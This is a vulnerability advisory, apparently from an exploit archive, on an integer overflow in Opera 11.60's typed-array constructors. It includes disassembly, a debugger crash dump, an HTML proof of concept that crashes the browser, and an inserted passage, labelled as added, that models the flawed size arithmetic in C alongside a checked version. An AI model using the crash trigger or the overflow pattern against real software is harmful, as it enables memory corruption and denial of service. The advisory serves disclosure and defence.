
Opera 11.60 Array Integer Overflow
Posted Feb 3, 2012
Authored by Code Audit Labs | Site vulnhunt.com

Code Audit Labs has discovered an integer overflow vulnerability in array functions like Int32Array, Int16Array, etc in Opera versions 11.60 and below.

tags | exploit, overflow
MD5 | 10c8403b34ee40a75c985f5c03bce81e

CAL-2012-0004 opera array integer overflow


1 Affected Products
=================
11.60 and prior


2 Vulnerability Details
=====================

Code Audit Labs (http://www.vulnhunt.com) has discovered an integer
overflow vulnerability in typed-array constructors such as
Int32Array, Int16Array and the like.

The Opera vendor says: "We have reproduced the problem, and determined that it
does not have any security implications, since the crash is caused by
a memory fill operation which the webpage has no control over, and this
operation will always crash. It is therefore classified as a stability
issue, not a security issue."


We still insist that whether this is a security issue should be judged by the
root cause of the bug, not by whether it is currently exploitable. Just because
you think it is unexploitable does not mean someone cannot exploit it after deeper research.

So if most of the security community thinks this is a security issue,
please assign a CVE number.


3 Analysis
=========
Int16Array(2147483647) example
Memory corruption happens when the following conditions are all satisfied:
1: x*2 > 2
2: x*2 != 0
3: (x*2-1)+0x1f overflows 32 bits.

So the length passed to malloc is (x*2-1)+0x1f, which wraps to a small value, and
memset(eax+0x10, 0, x*2) then writes far past the undersized allocation, corrupting memory.


.text:5C769F57
.text:5C769F57 loc_5C769F57: ; CODE XREF: sub_5C769DCE+17Cj
.text:5C769F57 mov eax, [esp+48h+var_20] ; var_20 is 2
.text:5C769F5B imul eax, [esp+48h+var_3C] ; var_3C is 80000001
.text:5C769F60 cmp eax, [esp+48h+var_3C]
.text:5C769F64 jb short loc_5C769F37
.text:5C769F66 mov [esp+48h+size], eax
.text:5C769F6A mov eax, [ebp+arg_0]
.text:5C769F6D call sub_5C14A6E8
.text:5C769F72 push [esp+48h+size] ; size
.text:5C769F76 push dword ptr [eax] ; int
.text:5C769F78 push [ebp+arg_0] ; int
.text:5C769F7B call sub_5C765B6D
.text:5C769F80 add esp, 0Ch

...

.text:5C46A598
.text:5C46A598 arg_0 = dword ptr 4
.text:5C46A598 size = dword ptr 8
.text:5C46A598
.text:5C46A598 mov edx, [esp+arg_0]
.text:5C46A59C push esi
.text:5C46A59D mov esi, [esp+4+size]
.text:5C46A5A1 test esi, esi
.text:5C46A5A3 jz short loc_5C46A5AA
.text:5C46A5A5 lea eax, [esi-1]
.text:5C46A5A8 jmp short loc_5C46A5AC
.text:5C46A5AA ; ---------------------------------------------------------------------------
.text:5C46A5AA
.text:5C46A5AA loc_5C46A5AA: ; CODE XREF: sub_5C46A598+Bj
.text:5C46A5AA xor eax, eax
.text:5C46A5AC
.text:5C46A5AC loc_5C46A5AC: ; CODE XREF: sub_5C46A598+10j
.text:5C46A5AC mov ecx, [edx+8]
.text:5C46A5AF add eax, 1Fh
.text:5C46A5B2 push 0
.text:5C46A5B4 and eax, 0FFFFFFF8h
.text:5C46A5B7 push eax
.text:5C46A5B8 push edx
.text:5C46A5B9 call sub_5C019DA0

.text:5C765BF7 loc_5C765BF7: ; CODE XREF: sub_5C765B6D+50j
.text:5C765BF7 push [ebp+size] ; size
.text:5C765BFA lea eax, [ebx+10h]
.text:5C765BFD push 0 ; c
.text:5C765BFF push eax ; dst
.text:5C765C00 call memset
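The size arithmetic in the listing above, as an added C model that is not Opera's code and not part of the original advisory: vulnerable_alloc_size() replays the two stages shown (the imul with its "product < multiplicand" jb check, then the unchecked (len-1)+0x1f rounding), and safe_alloc_size() is a hardened counterpart that rejects the Int16Array(2147483647) request. The 0x10 header offset is taken from the memset call site; all function names are assumptions.

```c
#include <stdbool.h>
#include <stdint.h>
/* Added model of the arithmetic recovered in the advisory's listing (not
 * Opera's code). Stage 1: len = count * elem_size with the "product <
 * multiplicand" jb check. Stage 2: size = ((len-1)+0x1f) & ~7, unchecked.
 * The binary then runs memset(buf + 0x10, 0, len). */
#define HEADER_BYTES 0x10u            /* lea eax, [ebx+10h] before memset */

/* Stage 1 as in the binary; false where the jb branches away (e.g. count
 * 0x80000001 * 2 wraps to 2, and 2 < count). */
static bool byte_length_jb_check(uint32_t count, uint32_t elem_size, uint32_t *len)
{
    uint32_t prod = count * elem_size; /* imul eax: wraps at 32 bits */
    if (prod < count) return false;    /* cmp eax, count ; jb */
    *len = prod;
    return true;
}

/* Stage 2 as in the binary: (len-1)+0x1f rounded down to 8, unchecked. */
static uint32_t alloc_size_unchecked(uint32_t len)
{
    uint32_t v = len ? len - 1 : 0;    /* test esi,esi / lea eax,[esi-1] */
    v += 0x1fu;                        /* add eax, 1Fh: may wrap to ~0x1c */
    return v & 0xFFFFFFF8u;            /* and eax, 0FFFFFFF8h */
}

/* Allocation size the vulnerable path requests for `count` elements, or 0
 * if stage 1 rejects the length (a real result is never 0: len 0 -> 0x18). */
static uint32_t vulnerable_alloc_size(uint32_t count, uint32_t elem_size)
{
    uint32_t len;
    if (!byte_length_jb_check(count, elem_size, &len)) return 0;
    return alloc_size_unchecked(len);
}

/* Hardened counterpart: each step is range-checked and the result must hold
 * the header plus every one of the `len` bytes the memset writes. */
static bool safe_alloc_size(uint32_t count, uint32_t elem_size, uint32_t *out)
{
    uint32_t len, v, size;
    if (elem_size == 0 || count > UINT32_MAX / elem_size) return false;
    len = count * elem_size;           /* cannot wrap after the check above */
    v = len ? len - 1 : 0;
    if (v > UINT32_MAX - 0x1fu) return false;   /* add eax,1Fh would wrap */
    size = (v + 0x1fu) & 0xFFFFFFF8u;
    if (size < HEADER_BYTES || size - HEADER_BYTES < len) return false;
    *out = size;
    return true;
}
```

For Int16Array(2147483647) the vulnerable path passes the jb check (0xFFFFFFFE is not below 0x7FFFFFFF) and asks for only 0x18 bytes, while the memset still fills 0xFFFFFFFE bytes; the hardened version refuses at the wrapping add.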




4 Exploitable?
============
Who knows?


5 Crash info:
===============
(d10.ff4): Access violation - code c0000005 (first chance)
First chance exceptions are reported before any exception handling.
This exception may be expected and handled.
eax=01fff21d ebx=00000000 ecx=0367ffb0 edx=00000076 esi=019c5ff8 edi=03610e68
eip=675b347e esp=02314de0 ebp=02314e24 iopl=0 nv up ei pl nz na pe cy
cs=001b ss=0023 ds=0023 es=0023 fs=003b gs=0000 efl=00010207
*** ERROR: Symbol file could not be found. Defaulted to export symbols for C:\Program Files\Opera\Opera.dll -
Opera!OpGetNextUninstallFile+0x1961c:
675b347e 660f7f4150 movdqa xmmword ptr [ecx+50h],xmm0 ds:0023:03680000=????????????????????????????????
0:000> .exr -1
ExceptionAddress: 675b347e (Opera!OpGetNextUninstallFile+0x0001961c)
ExceptionCode: c0000005 (Access violation)
ExceptionFlags: 00000000
NumberParameters: 2
Parameter[0]: 00000001
Parameter[1]: 03680000
Attempt to write to address 03680000
0:000> kp
ChildEBP RetAddr
WARNING: Stack unwind information not available. Following frames may be wrong.
02314e24 00000000 Opera!OpGetNextUninstallFile+0x1961c



6 POC:
====
Open an HTML file with the following content:

<script>
// all of these crash
Int32Array(1073741823)
Float32Array(1073741823)
Float64Array(1073741823)
Int32Array(1073741823)
Uint32Array(1073741823)
Int16Array(2147483647)
ArrayBuffer(4294967295)
</script>




7 About Code Audit Labs:
=====================
Code Audit Labs secures your software, providing professional services including source
code audit and binary code audit.
Code Audit Labs: "You create value for customers, we protect your value"
http://www.VulnHunt.com
